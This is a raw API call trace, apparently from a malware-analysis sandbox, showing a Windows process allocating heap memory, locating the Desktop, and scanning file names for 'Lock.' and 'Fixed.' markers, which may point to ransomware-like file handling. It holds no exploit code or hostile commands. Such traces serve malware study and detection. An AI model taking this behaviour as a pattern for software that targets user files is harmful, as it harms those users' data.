returned 1 [0162.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0162.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0162.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0162.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0162.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0162.717] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0162.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0162.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0162.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0162.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0162.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0162.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0162.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0162.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0162.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0162.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xe0) returned 0x2416f30 [0162.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0162.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0162.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0162.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0162.718] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0162.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0162.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0162.718] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0162.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0162.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0162.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0162.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0162.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0162.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0162.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0162.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0162.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x6e) returned 0x240c948 [0162.719] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop/bY-NIrDXo_nG.bmp", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY-NIrDXo_nG.bmp", lpFilePart=0x8bf658*="bY-NIrDXo_nG.bmp") returned 0x36 [0162.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240c948 | out: hHeap=0x25c0000) returned 1 [0162.719] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY-NIrDXo_nG.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\by-nirdxo_ng.bmp")) returned 0xffffffff [0162.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0162.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0162.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0162.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0162.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0162.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0162.719] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0162.719] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0162.719] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0162.719] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0162.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0162.719] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0162.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0162.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0162.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0162.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0162.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0162.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0162.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0162.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0162.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0162.720] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0162.720] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0162.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d1NqFAAxwvSf3pfr2yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0162.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1NqFAAxwvSf3pfr2yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0162.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NqFAAxwvSf3pfr2yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qFAAxwvSf3pfr2yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FAAxwvSf3pfr2yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0162.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AAxwvSf3pfr2yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0162.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AxwvSf3pfr2yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0162.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xwvSf3pfr2yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wvSf3pfr2yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vSf3pfr2yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.720] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sf3pfr2yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f3pfr2yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0162.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3pfr2yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0162.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pfr2yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fr2yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0162.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r2yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0162.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yZp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zp.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.721] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p.gif", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0162.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0162.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0162.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0162.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0162.721] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0162.721] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0162.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0162.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0162.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0162.721] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0162.722] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d1NqFAAxwvSf3pfr2yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1NqFAAxwvSf3pfr2yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NqFAAxwvSf3pfr2yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qFAAxwvSf3pfr2yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FAAxwvSf3pfr2yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AAxwvSf3pfr2yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AxwvSf3pfr2yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xwvSf3pfr2yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wvSf3pfr2yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vSf3pfr2yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Sf3pfr2yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f3pfr2yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3pfr2yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pfr2yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fr2yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r2yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yZp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zp.gif", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0162.723] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0162.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0162.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0162.723] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0162.723] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0162.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0162.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0162.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c00 [0162.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0162.723] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0162.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0162.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0162.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0162.723] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0162.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0162.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0162.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa920 [0162.723] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0162.724] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0162.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0162.724] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0162.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0162.736] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0162.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0162.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0162.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0162.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1948 [0162.736] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0162.736] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0162.736] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0162.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0162.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0162.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0162.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0162.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0162.737] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0162.737] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0162.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0162.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0162.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0162.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0162.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0162.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0162.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0162.737] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0162.737] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0162.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ab0 [0162.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0162.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0162.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0162.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0162.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a96d8 [0162.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0162.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0162.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0162.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0162.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0162.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0162.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0162.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0162.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0162.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0162.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0162.738] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0162.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0162.738] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0162.738] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0162.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0162.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0162.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0162.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0162.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0162.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0162.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0162.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0162.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0162.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0162.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0162.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0162.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0162.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0162.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2658 [0162.739] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0162.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0162.739] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0162.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0162.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0162.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0162.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0162.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0162.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0162.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0162.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0162.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0162.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0162.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0162.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0162.740] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0162.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0162.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0162.740] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0162.740] RtlAllocateHeap 